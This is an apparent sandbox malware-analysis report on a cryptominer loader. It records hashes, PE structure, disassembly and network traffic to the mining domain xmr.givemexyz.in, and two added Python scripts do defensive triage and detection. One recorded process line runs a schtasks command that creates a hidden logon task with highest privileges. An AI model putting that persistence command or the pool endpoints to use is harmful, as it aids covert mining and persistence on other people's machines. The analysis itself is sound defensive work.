• Filename: ShinChangerFort.exe, Detection: malicious
• Filename: Sapphire.exe, Detection: malicious
• Filename: p5x6Tk5245.exe, Detection: malicious
• Filename: install.exe, Detection: malicious
• Filename: wpXW8288lr.exe, Detection: malicious
• Filename: SecuriteInfo.com.Trojan.InjectNET.14.313.exe, Detection: malicious
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        Process:C:\Windows\System32\conhost.exe
                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Category:dropped
                                                        Size (bytes):31232
                                                        Entropy (8bit):7.562503947370134
                                                        Encrypted:false
                                                        SSDEEP:384:VBTkmAadBYV6qxjqoz9EFEJNsoZuKVAWIL47zbMluB8qywZfH2pUq:kqjhWN6Fayodnm47zbMluB8U2pU
                                                        MD5:2497F634A80476AE2EAE956D8B84528E
                                                        SHA1:37DC97DFDA569615F036C7B3F74732231C9772E7
                                                        SHA-256:91EFE614A81B0E8F15EF7814CEB90DA038E6FDA29AAB733E53D8E3B49706B9BE
                                                        SHA-512:228F42E993F4089223ECDA317DCED1C8274CBAE75667478F43D31F9CF39DF35F62BE19624E24C39E2D4980C3174E6ED4BB2214F0383491AF862BF4681FBDAD35
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
• Antivirus: Metadefender, Detection: 49%
                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./..........`......."........@......................................|......................................................0...<...................................................................................l................................text............................... ..`.rdata..n]...0...^..................@..@.bss.....................................pdata...............x..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.999681283638092
                                                        TrID:
                                                        • Win64 Executable (generic) (12005/4) 74.80%
                                                        • Generic Win/DOS Executable (2004/3) 12.49%
                                                        • DOS Executable Generic (2002/1) 12.47%
                                                        • VXD Driver (31/22) 0.19%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                        File name:pcNCraWcRk.exe
                                                        File size:2234368
                                                        MD5:0958fa69ba0e6645c42215c5325d8f76
                                                        SHA1:800666827e118ce78aef55c47864512ef9d3b7a6
                                                        SHA256:1b0c9f3f22d25cd518e480798ee44e8876107b2d37b2e92997c039d4a6c69db1
                                                        SHA512:95f582f9b45325951fe4cdc40cd5ae1037a955e437c052c64186641785f8170c7c9cb9532756166e267f0398217991c616ad86115ebb8d0b183898887950cc28
                                                        SSDEEP:24576:1drStRzAeuEl5IJw6mgjogJlV50mtIJfBaH1NUqGCnW1lm/SIwDIGPvarynWZqJ3:LGRUEIRPlVydBLCelDI1m0yBJSXM/nP
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...........!......"........@..............................P"......~"....................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4022fa
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:
                                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:02549ff92b49cce693542fc9afb10102

                                                        Entrypoint Preview

Instruction (x86-64 decoding of the bytes at the entrypoint; the call sequence with the immediates 1, 0x10000 and 0x30000 is consistent with the CRT start-up calls to __set_app_type and _controlfp listed under Imports)
push rbp
mov rbp, rsp
sub rsp, 40h
mov rax, 0000000000000004h
mov r8, rax
mov eax, 00000000h
mov r11, rax
lea rax, qword ptr [rbp-04h]
mov r10, rax
mov rcx, r10
mov rdx, r11
call 00007FED04FB3421h
lea rax, qword ptr [rip-68h]
mov r10, rax
mov rcx, r10
call 00007FED04FB343Fh
mov eax, 00000001h
mov r10, rax
mov rcx, r10
call 00007FED04FB3437h
mov eax, 00030000h
mov r11, rax
mov eax, 00010000h
mov r10, rax
mov rcx, r10
mov rdx, r11
call 00007FED04FB3424h
mov rax, qword ptr [rip+00220624h]
mov rcx, qword ptr [rip+00220625h]
mov rdx, qword ptr [rip+00220626h]
mov qword ptr [rbp-10h], rax
lea rax, qword ptr [rbp-04h]
mov qword ptr [rsp+20h], rax
mov eax, dword ptr [rip+00221C17h]
mov r9, rax
mov r8, rdx
mov r11, rcx
mov rax, qword ptr [rbp-10h]
mov r10, rax
mov rcx, r10
mov rdx, r11
call 00007FED04FB33E9h
mov rax, qword ptr [rip+002205E1h]
mov rcx, qword ptr [rip+002205E2h]
mov rdx, qword ptr [rip+002205E3h]

                                                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x222930 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x224000 | 0x90 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x22296c | 0x90 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                                                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x14e0 | 0x1600 | False | 0.327414772727 | data | 5.39828227973 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x3000 | 0x21fb6e | 0x21fc00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss | 0x223000 | 0xfac | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata | 0x224000 | 0x90 | 0x200 | False | 0.17578125 | data | 1.20871562712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Imports

DLL | Import
msvcrt.dll | malloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
kernel32.dll | Sleep, CreateProcessA, SetUnhandledExceptionFilter
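The static picture above is a loader rather than the miner itself: a 0x1600-byte .text section, a 0x21fc00-byte .rdata section whose entropy the tool could not compute inside a file whose overall entropy is 7.9997, a zero link timestamp, and an import table of thirteen msvcrt symbols plus Sleep, CreateProcessA and SetUnhandledExceptionFilter. The Python below is an added example, not part of the report or of the sample's code: it parses a PE section table with the standard library, computes per-section Shannon entropy (the same 8-bit figure the report prints), and applies three loader-stub indicators. The thresholds, the build_sample_pe() fixture and the sample_pe() layout are this example's own assumptions; import-table parsing is left out.

```python
"""Static triage of a PE file: per-section entropy and loader-stub indicators.

Added example (not from the report or the sample). Standard library only; the
PE parsed below is a constructed fixture, not the analysed file.
"""
import math
import random
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000

# Thresholds are this example's assumptions, not values taken from the report.
CODE_FRACTION_MAX = 0.05     # executable sections hold under 5% of the file
PAYLOAD_ENTROPY_MIN = 7.0    # near-random data (8.0 is the maximum)
PAYLOAD_FRACTION_MIN = 0.50  # one data section holds most of the file


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 to 8.0: the 'Entropy (8bit)' figure the report prints."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(pe: bytes) -> dict:
    """Read the COFF header and section table (PE32 and PE32+ alike)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size           # section table follows the optional header
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, _, _, _, _, schars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": rsize,
            "characteristics": schars,
            "entropy": shannon_entropy(pe[rptr:rptr + rsize]),
        })
    return {"machine": machine, "timestamp": timestamp, "characteristics": chars,
            "size": len(pe), "sections": sections}


def triage(pe: bytes) -> list:
    """Return the indicator names that fire for a packed-loader layout."""
    info = parse_pe(pe)
    size = info["size"]
    flags = []
    if info["timestamp"] == 0:                       # link time deliberately zeroed
        flags.append("zero_link_timestamp")
    code = sum(s["raw_size"] for s in info["sections"]
               if s["characteristics"] & IMAGE_SCN_MEM_EXECUTE)
    if code and code / size < CODE_FRACTION_MAX:
        flags.append("tiny_code_section")
    for s in info["sections"]:                       # opaque blob in a non-executable section
        if (not s["characteristics"] & IMAGE_SCN_MEM_EXECUTE
                and s["entropy"] >= PAYLOAD_ENTROPY_MIN
                and s["raw_size"] / size >= PAYLOAD_FRACTION_MIN):
            flags.append("high_entropy_payload:" + s["name"])
    return flags


def build_sample_pe(sections) -> bytes:
    """Constructed PE32+ fixture; sections is a list of (name, data, characteristics)."""
    opt_size = 240                                    # PE32+ optional header size
    hdr_end = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    first_raw = (hdr_end + 0x1FF) & ~0x1FF            # FileAlignment 0x200
    raw_ptr, va, table, blobs = first_raw, 0x1000, b"", b""
    for name, data, chars in sections:
        rsize = (len(data) + 0x1FF) & ~0x1FF
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), va, rsize, raw_ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(rsize, b"\0")
        raw_ptr += rsize
        va += (len(data) + 0xFFF) & ~0xFFF            # SectionAlignment 0x1000
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    opt = struct.pack("<H", 0x20B).ljust(opt_size, b"\0")  # PE32+ magic, rest zero
    return (bytes(dos) + b"PE\0\0" + coff + opt + table).ljust(first_raw, b"\0") + blobs


def sample_pe() -> bytes:
    """Fixture shaped like the report's layout: tiny code, one huge opaque blob."""
    rng = random.Random(1)
    text = b"\x48\x89\xe5\x90" * 0x580                            # 0x1600 bytes, 4 symbols
    rdata = bytes(rng.getrandbits(8) for _ in range(0x20000))     # near-random payload
    return build_sample_pe([
        (".text", text, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (".rdata", rdata, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    ])


if __name__ == "__main__":
    for s in parse_pe(sample_pe())["sections"]:
        print(f"{s['name']:<8} raw=0x{s['raw_size']:x} entropy={s['entropy']:.3f}")
    print(triage(sample_pe()))
```

Run against a real file, `triage(open(path, "rb").read())` is the only call needed. The entropy test alone is weak evidence (compressed resources also score near 8.0); it is the combination with a near-empty code section and a stub-sized import table that points at a payload unpacked at runtime, which is why the indicators are reported together rather than collapsed into a single score.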

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2021 18:20:34.654522896 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:20:34.802129984 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:20:34.802308083 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:20:34.802676916 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:20:34.949754000 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:20:34.952109098 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:20:35.006928921 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:20:58.889048100 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:20:59.037017107 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:20:59.165097952 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:03.528681040 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:03.676541090 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:21:03.852927923 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:09.292006969 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:21:09.353405952 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:21.406594992 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:21.554615974 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:21:21.667011976 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:22.168793917 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:21:22.354504108 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:31.754548073 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:31.902127981 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:21:31.964907885 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:53.601584911 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:21:53.749329090 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:21:53.857152939 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:08.663139105 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:08.811105013 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:22:08.858422995 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:14.833985090 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:14.982608080 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:22:15.171436071 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:37.397836924 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:22:37.470323086 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:39.301384926 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:22:39.360992908 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:40.564130068 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:40.712826967 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:22:40.861068964 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:43.200921059 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:43.348690987 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:22:43.470679045 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:52.311743021 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:52.459568024 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:22:52.674566984 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:55.326248884 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:22:55.474033117 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:22:55.674835920 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:00.538438082 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:00.686855078 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:23:00.862798929 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:06.417404890 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:06.566159010 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:23:06.675754070 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:14.762794018 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:14.910789013 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:23:14.973330975 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:16.868604898 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:17.016742945 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:23:17.176672935 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:22.813848972 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:22.961983919 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:23:23.177175999 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:24.301785946 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:23:24.380407095 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:27.197225094 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:27.345983982 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:23:27.568159103 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:23:43.398880005 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:23:43.484649897 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:24:02.688910007 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:24:02.836719036 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:24:02.977413893 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:24:05.420484066 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
Nov 1, 2021 18:24:05.568367004 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
Nov 1, 2021 18:24:05.680722952 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117

                                                        UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 1, 2021 18:20:34.627938986 CET | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Nov 1, 2021 18:20:34.650455952 CET | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Nov 1, 2021 18:22:29.095741987 CET | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Nov 1, 2021 18:22:29.119029999 CET | 53 | 55854 | 8.8.8.8 | 192.168.2.4

                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 1, 2021 18:20:34.627938986 CET | 192.168.2.4 | 8.8.8.8 | 0xd8f8 | Standard query (0) | xmr.givemexyz.in | A (IP address) | IN (0x0001)
Nov 1, 2021 18:22:29.095741987 CET | 192.168.2.4 | 8.8.8.8 | 0xe55c | Standard query (0) | xmr.givemexyz.in | A (IP address) | IN (0x0001)

                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 1, 2021 18:20:34.650455952 CET | 8.8.8.8 | 192.168.2.4 | 0xd8f8 | No error (0) | xmr.givemexyz.in | - | 212.114.52.24 | A (IP address) | IN (0x0001)
Nov 1, 2021 18:20:34.650455952 CET | 8.8.8.8 | 192.168.2.4 | 0xd8f8 | No error (0) | xmr.givemexyz.in | - | 198.23.214.117 | A (IP address) | IN (0x0001)
Nov 1, 2021 18:20:34.650455952 CET | 8.8.8.8 | 192.168.2.4 | 0xd8f8 | No error (0) | xmr.givemexyz.in | - | 194.5.249.24 | A (IP address) | IN (0x0001)
Nov 1, 2021 18:22:29.119029999 CET | 8.8.8.8 | 192.168.2.4 | 0xe55c | No error (0) | xmr.givemexyz.in | - | 198.23.214.117 | A (IP address) | IN (0x0001)
Nov 1, 2021 18:22:29.119029999 CET | 8.8.8.8 | 192.168.2.4 | 0xe55c | No error (0) | xmr.givemexyz.in | - | 212.114.52.24 | A (IP address) | IN (0x0001)
Nov 1, 2021 18:22:29.119029999 CET | 8.8.8.8 | 192.168.2.4 | 0xe55c | No error (0) | xmr.givemexyz.in | - | 194.5.249.24 | A (IP address) | IN (0x0001)
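The DNS answers return three A records for xmr.givemexyz.in, and the TCP table shows a single session from 192.168.2.4:49763 to one of them, 198.23.214.117:8080, that stays open for about three and a half minutes carrying only sparse packets. None of these observations is conclusive on its own (8080 is also a common HTTP proxy port, and long idle TCP sessions are normal), so a detection should require them to agree. The Python below is an added example, not part of the report: it correlates DNS answers with per-flow packet summaries and flags a flow when at least two independent indicators fire. The log lines are constructed from the report's own domain, addresses, ports and timestamps plus one made-up benign flow to 203.0.113.10; the keyword list, port list and duration/rate thresholds are this example's assumptions.

```python
"""Correlate DNS answers with TCP flow summaries to flag a pool-style session.

Added example (not from the report). Log lines are constructed from the
report's domain, addresses, ports and timestamps plus one made-up benign flow.
"""
from datetime import datetime

# Assumptions of this example, not facts from the report.
MINING_LABELS = ("xmr", "monero", "pool", "mine")
POOL_PORTS = {3333, 4444, 5555, 7777, 8080, 14444}
MIN_DURATION_S = 120.0   # session outlives a normal HTTP exchange
MAX_PKT_RATE = 1.0       # packets per second: keep-alive chatter, not bulk transfer

# Constructed: "<date> <time> <queried name> <A record>"
DNS_LOG = """\
2021-11-01 18:20:34.650 xmr.givemexyz.in 212.114.52.24
2021-11-01 18:20:34.650 xmr.givemexyz.in 198.23.214.117
2021-11-01 18:20:34.650 xmr.givemexyz.in 194.5.249.24
"""

# Constructed: "<date> <time> <src ip> <src port> <dst ip> <dst port>"; the first
# seven lines are a subset of the report's TCP table, the last two are made up.
PACKET_LOG = """\
2021-11-01 18:20:34.654 192.168.2.4 49763 198.23.214.117 8080
2021-11-01 18:20:34.802 198.23.214.117 8080 192.168.2.4 49763
2021-11-01 18:20:58.889 192.168.2.4 49763 198.23.214.117 8080
2021-11-01 18:21:21.406 192.168.2.4 49763 198.23.214.117 8080
2021-11-01 18:22:08.663 192.168.2.4 49763 198.23.214.117 8080
2021-11-01 18:23:00.538 192.168.2.4 49763 198.23.214.117 8080
2021-11-01 18:24:05.680 192.168.2.4 49763 198.23.214.117 8080
2021-11-01 18:20:40.000 192.168.2.4 49800 203.0.113.10 443
2021-11-01 18:20:40.050 203.0.113.10 443 192.168.2.4 49800
"""


def parse_ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def resolved_names(dns_log: str) -> dict:
    """Map each answered address to the set of names that resolved to it."""
    names = {}
    for line in dns_log.splitlines():
        _, _, name, addr = line.split()
        names.setdefault(addr, set()).add(name.lower())
    return names


def flows(packet_log: str) -> list:
    """Group packets into bidirectional flows; the first packet names the client."""
    table = {}
    for line in packet_log.splitlines():
        date, clock, src, sport, dst, dport = line.split()
        ts = parse_ts(f"{date} {clock}")
        key = frozenset({(src, int(sport)), (dst, int(dport))})   # direction-agnostic
        f = table.setdefault(key, {"client": (src, int(sport)), "server": (dst, int(dport)),
                                   "first": ts, "last": ts, "packets": 0})
        f["packets"] += 1
        f["first"], f["last"] = min(f["first"], ts), max(f["last"], ts)
    return list(table.values())


def detect(dns_log: str, packet_log: str) -> list:
    """Flag flows where at least two independent pool indicators agree."""
    names = resolved_names(dns_log)
    findings = []
    for f in flows(packet_log):
        server_ip, server_port = f["server"]
        hits = sorted(names.get(server_ip, set()))
        duration = (f["last"] - f["first"]).total_seconds()
        reasons = []
        if any(label in n for n in hits for label in MINING_LABELS):
            reasons.append("mining keyword in resolved name")
        if server_port in POOL_PORTS:
            reasons.append(f"pool-style port {server_port}")
        if duration >= MIN_DURATION_S and f["packets"] / duration <= MAX_PKT_RATE:
            reasons.append("long-lived low-rate session")
        if len(reasons) >= 2:
            findings.append({"client": f["client"], "server": f["server"], "names": hits,
                             "duration_s": round(duration, 3), "packets": f["packets"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in detect(DNS_LOG, PACKET_LOG):
        print(hit)
```

Feeding the same two functions from Zeek's dns.log and conn.log (or from a packet capture reduced to the six fields above) is a matter of changing the `split()` calls. The keyword test is the weakest of the three indicators, since pool operators rotate domains freely; the two behavioural tests, a pool-style port and a session that idles for minutes with occasional small exchanges, are what survive a domain change.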

                                                        Code Manipulations

                                                        System Behavior

                                                        General

                                                        Start time: 18:20:03
                                                        Start date: 01/11/2021
                                                        Path: C:\Users\user\Desktop\pcNCraWcRk.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: 'C:\Users\user\Desktop\pcNCraWcRk.exe'
                                                        Imagebase: 0x400000
                                                        File size: 2234368 bytes
                                                        MD5 hash: 0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: low

                                                        General

                                                        Start time: 18:20:03
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
                                                        Imagebase: 0x7ff724c50000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: .Net C# or VB.NET
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:06
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase: 0x7ff622070000
                                                        File size: 273920 bytes
                                                        MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
                                                        Reputation: high

                                                        General

                                                        Start time: 18:20:07
                                                        Start date: 01/11/2021
                                                        Path: C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit): false
                                                        Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase: 0x7ff724c50000
                                                        File size: 625664 bytes
                                                        MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges: true
                                                        Has administrator privileges: true
                                                        Programmed in: C, C++ or other language
